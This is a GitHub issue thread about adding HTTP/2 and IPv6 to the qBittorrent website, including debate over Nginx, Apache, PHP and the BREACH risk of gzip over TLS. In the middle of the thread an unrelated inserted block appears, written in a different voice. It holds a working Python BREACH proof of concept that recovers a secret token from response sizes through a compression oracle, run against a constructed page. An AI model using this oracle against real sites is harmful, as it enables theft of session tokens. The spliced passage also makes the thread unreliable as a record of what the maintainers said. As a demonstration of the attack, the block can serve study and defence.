qbittorrent / qBittorrent-website

qBittorrent website
https://www.qbittorrent.org

Suggestions for server #46

Closed. Chocobo1 closed this issue 6 years ago.

Chocobo1 commented 6 years ago

Aside from a new homepage, would be nice to have:

Also tagging @Balls0fSteel :)

Balls0fSteel commented 6 years ago

Yeah I checked HTTP/2 just recently, but the module was tagged experimental IIRC. Will look into it on the weekend again. (The stack runs on Apache but we can move to Nginx, there is nothing keeping us on Apache.)

IPv6 we have IPv6, but it's disabled in sysconf. :P Will re-enable it and look things up. Should work too.

Please ping me in a few days (Tuesday?) if I don't do stuff. Is there a bot for GitHub that pings people if they ask for it?

Chocobo1 commented 6 years ago

+1 for Nginx We can run it on another port to test it before dumping apache.

> If I don't do stuff. Is there a bot for GitHub that pings people if they ask for it?

Not one I am aware of. But we're not in a hurry.

Balls0fSteel commented 6 years ago

Alright, I set up nginx + http/2 for it (yeah, read the manual and spent 5 minutes copy-pasting :D). It runs OK on an alternative port. Tomorrow I will set up the SSL part (well, that's like needed for http2), and we will see. If it serves things out alright, I will shut Apache and let Nginx run amok.

Fingers crossed. (Probably I will just set up blank page configs and let Certbot just make new certs. No one cares about certs anymore since Letsencrypt started anyway.)

Thanks for the suggestion btw, this really kicks our site up a notch (kinda pushes it to 2017-2018).

Chocobo1 commented 6 years ago

> Tomorrow I will set up the SSL part (well, that's like needed for http2), and we will see. If it serves things out alright, I will shut Apache and let Nginx run amok.

Cool! We currently set a bunch of HTTP headers in .htaccess and nginx seems to reject that user-config idea: link. Well, I guess we can tune it later.

> Thanks for the suggestion btw, this really kicks our site up a notch (kinda pushes it to 2017-2018).

You're welcome!

Just got into my mind, IPv6 would need sledgehammer999 to setup DNS AAAA records, we should ping him when ready.

Balls0fSteel commented 6 years ago

Ah, I can access the DNS settings for both sites, so it's okay for now. (I cannot really tell which has it better. Cloudflare has its hiccups and the other provider has its issues.)

I already made AAAA records for the forums + builds (the guinea pigs, lol). IPv6 is up and running (forgot to add), just I didn't want to mess around with it before Nginx is done because you know, you have to set it up in the HTTP server too. So if I spent the time to make it work in Apache, then I had to re-make it all over again for Nginx.

So I just kept it for Nginx. But we should see today in a few hours. (Also I gotta fetch myself some IPv6, or maybe I will just use some remote thingie to try IPv6. My country won't have IPv6 'til 2030 or something like that by this rate.)

Balls0fSteel commented 6 years ago

Ok, setting up NGINX for HTTPS (http/2) might be a hell of a task.

- https://bugs.launchpad.net/nginx/+bug/1403283
- https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=773332
- https://gist.github.com/dkubb/7473330 (*)

So... I don't know. Basically, you get thrown down in Google Rankings / get punished, or you run your site insecure. Great choices for 2017, from an enterprise software (nginx) that can cost thousands of dollars if you want support for it. Terrific software, I must say.

Using Cloudflare for the main site could simply mitigate all risks while using lean configs, but it's out of the question sadly (does not support what we need). So... I don't know. Apache + https2 maybe? It cannot be that bad, can it?

(*) It's said to be fixed but all web results warn you that it is still active. I don't know. The version we have is straight from Nginx (deb repo).

Chocobo1 commented 6 years ago

> So... I don't know. Basically, you get thrown down in Google Rankings / get punished, or you run your site insecure.

For the www.qbittorrent.org domain I think it's not that dangerous, as the site is only serving content. See: http://breachattack.com/ ("Am I affected?")

As for the forum, well, better not take the risk.

Anyway, what is the version of nginx you're testing?

> Apache + https2 maybe? It cannot be that bad, can it?

Problem is, newer Apache releases fixed some issues and the Ubuntu repo is too slow to catch up (one reason why I dumped Debian/Ubuntu). And they don't include the http2 module by default (because it is experimental) even in their latest release, 17.04. Unless there is a trustworthy repo to fetch from, or you want to build it manually for every release :P, I don't recommend it.
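The BREACH precondition Chocobo1 is pointing at (HTTP compression applied to a response that contains both a secret and attacker-controlled input reflected into the same body) can be shown in a few lines of Python. This is an added example and not code from this issue or from the qBittorrent project: the HTML page, the logout token `7f3a9c`, the `q` parameter and the `tok=` prefix are all constructed for the demonstration, and the compressor is run with zlib's fixed-Huffman strategy (`Z_FIXED`) so that each correct character shows up as exactly one byte less on the wire. With the dynamic Huffman tables nginx's gzip actually uses, the signal is fractional and a real attack needs padding tricks and repeated measurements, but the mechanism is the same.

```python
import zlib

# Constructed sample: a page that carries a per-session secret (the logout
# token) AND reflects the attacker-chosen query parameter q into the body.
# Both conditions together are what BREACH needs; a static site has neither.
SECRET_TOKEN = "7f3a9c"          # constructed, not a real token
HEX = "0123456789abcdef"         # the token's alphabet, known to the attacker


def render_page(q: str) -> bytes:
    """Constructed vulnerable page: secret in a link, q reflected unescaped."""
    return (
        "<html><head><title>Search</title></head>\n"
        f'<body><a href="/logout?tok={SECRET_TOKEN}">Log out</a>\n'
        '<form action="/search"><input name="q"></form>\n'
        f"<p>Results for: {q}</p>\n"
        "</body></html>\n"
    ).encode()


def gzip_len(body: bytes) -> int:
    """Compressed size as a network observer sees it (gzip framing, wbits=31).

    Z_FIXED selects DEFLATE's static Huffman table: a literal always costs
    8 bits and a 3..10 byte back-reference always costs the same number of
    bits no matter what else is on the page, so the oracle below is exact
    instead of statistical. Real servers use dynamic tables (noisier signal).
    """
    c = zlib.compressobj(9, zlib.DEFLATED, 31, 8, zlib.Z_FIXED)
    return len(c.compress(body) + c.flush())


def oracle(guess: str) -> int:
    """Everything the attacker observes: response length for a chosen q."""
    return gzip_len(render_page(guess))


def recover_token(known_prefix: str = "tok=", length: int = len(SECRET_TOKEN)) -> str:
    """Recover the token one hex digit at a time.

    The guess 'tok=' + recovered + c is reflected after the real
    '?tok=7f3a9c' link, so DEFLATE emits it as a back-reference to the link.
    The candidate that extends that back-reference by one more byte replaces
    an 8-bit literal with nothing, i.e. compresses exactly one byte shorter.
    """
    recovered = ""
    for _ in range(length):
        sizes = {c: oracle(known_prefix + recovered + c) for c in HEX}
        best = min(sizes, key=sizes.get)
        # The winner must be strictly shorter than every other candidate;
        # a tie would mean the oracle is ambiguous at this position.
        assert all(sizes[best] < v for k, v in sizes.items() if k != best)
        recovered += best
    return recovered


if __name__ == "__main__":
    print("oracle('tok=7f3a') =", oracle("tok=7f3a"), "bytes")   # correct prefix
    print("oracle('tok=7f3b') =", oracle("tok=7f3b"), "bytes")   # one byte longer
    print("recovered token:", recover_token())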

Balls0fSteel commented 6 years ago

Welp. Can't believe so much time passed and it's still just experimental in 17.04... crazy. A PPA could probably work; I usually just use dget and push it to a simple personal repo (or just use pbuilder, meh).

NGINX version: I used the deb repo they provide. So it should be the latest and greatest. The only question is whether it's already patched or not. The Debian page says it is, but online everyone is crying about it and recommends disabling GZIP altogether.

But yeah, if https2 is just broken in Apache, there will be no choice besides Nginx.

Balls0fSteel commented 6 years ago

Btw, if being "experimental" or "broken" or "vulnerable" means they can access the data, we should not care like AT ALL. What could anyone ever steal? A forum login that could be hacked with some 0-day anyway? Use Wireshark to capture our qBittorrent.org website?

Like, there is really zero security implications for us here... IMO.

Chocobo1 commented 6 years ago

> Like, there is really zero security implications for us here... IMO.

Even so, it will make us look bad/incompetent. Oh damn, the horror of a security breach headline on a news site.

Balls0fSteel commented 6 years ago

Free publicity is always good, am I right? 👍 Just kidding. I will enable it and see how much these sites cry about our "safety".

Balls0fSteel commented 6 years ago

Spent the last few hours with Apache. Turns out we would have to upgrade the php package too. No biggie, right? Well, except it is. SMF is known to lag (very far) behind and the latest version only added support for 7.0, but 7.1 refuses to work.

So now we have a way-up-to-date system that still won't load http/2 even though the module is enabled. So... Nginx, here we come!

sledgehammer999 commented 6 years ago

I know how fun it is to play with new toys, but let me remind you that the current site is very simple. So you don't have to jump through hoops to get http/2 working. PS: I am not blocking the http/2 feature, I am just reminding you of the simplicity.

Balls0fSteel commented 6 years ago

I know... The entire move would have been so simple, but SMF apparently only supports the old version and the 7.0 version. The changelog said php7 so I did not bother to set up an entire VM just to test this one thing out. And the Apache PPA would have bumped up the entire thing to 7.1 (or 7.2) (if you want http/2 you have to add the Apache + PHP PPAs from the same person). So either one thing works, or the other one.

Because the site is simple. But the http/2 implementation in Apache is not. Funny enough, it worked just fine until the very last version with the stock php. But of course, the new version does not work anymore. So you gotta bump the php as well. And... you know the rest.

NGINX ... I have set it up on alternate ports once my Apache adventure was over and I cleaned up the mess. But there is no telling if it will work if I swap it. So I will wait until weekend or Thursday, then do a swap early morning / late night and hope for the best. It should work, but you know how it is.

Balls0fSteel commented 6 years ago

Did not have time to mess around but Apache received a patch from the repo and now the main site is HTTP/2 enabled (by Apache). Yay.

I will set up IPv6 tomorrow (just have to enable it in the Apache config, add the records and off we go). Btw there is SPDY support too that we could add, but I could not find any solid info on this. Like, the Google page says SPDY has been donated to Apache - so you should not use that one. If you try to look for it at Apache, there is nothing.

Yet, if you visit Google.com, and use "SPDY Indicator" in Chrome, it will show it's SPDY+HTTP/2 enabled. We will live without this one though, no worries.

Balls0fSteel commented 6 years ago

Okay so IPv6 is enabled, records are added.

So HTTP/2 and IPv6 are OK. But we are still not 100%.

"The authoritative DNS server is not accessible over IPv6. Caution! IPv6 only users will have problems to access your site." http://validador.ipv6.br/index.php?site=qbittorrent.org&lang=en

The entries we have at Cloudflare work like a charm. But Namecheap returns this error.

This page: https://www.namecheap.com/support/knowledgebase/article.aspx/768/10/how-do-i-register-personal-nameservers-for-my-domain says I have to contact support. But now we will have to run our DNS server as well? Wow.

Update: Some sites report it OK, some complain. Dunno. Cloudflare passes all tests, Namecheap fails a few.

Chocobo1 commented 6 years ago

Great job!! I can verify AAAA records are indeed there & http/2 is working on qbittorrent.org & forum. 🥇

> Btw there is SPDY support too that we could add, but I could not find any solid info on this

SPDY is the predecessor of HTTP/2, so just ignore it; IIRC it is being deprecated.

> "The authoritative DNS server is not accessible over IPv6. Caution! IPv6 only users will have problems to access your site." But now we will have to run our DNS server as well? Wow.

No need, that's namecheap's problem, IMO, now is good enough. Any sane person won't go (and can't go anywhere) with IPv6 only.

Balls0fSteel commented 6 years ago

Thanks for checking and the original suggestion! Added http/2 for the rest of the bunch as well.

Chocobo1 commented 6 years ago

Thanks to you too. I suppose this ticket can be closed.